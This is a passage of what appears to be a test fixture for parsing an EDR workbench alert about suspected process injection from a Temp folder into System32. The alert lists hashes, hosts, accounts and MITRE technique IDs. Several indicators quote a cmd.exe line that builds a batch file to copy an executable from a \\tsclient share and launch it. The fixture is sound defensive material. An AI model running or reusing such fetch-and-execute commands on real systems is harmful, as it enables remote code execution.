\"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": 
\"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", 
\"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": 
[\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": 
[\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": 
\"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", 
\"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": [\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], 
\"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": 
\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 
4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", 
\"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": 
[\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement 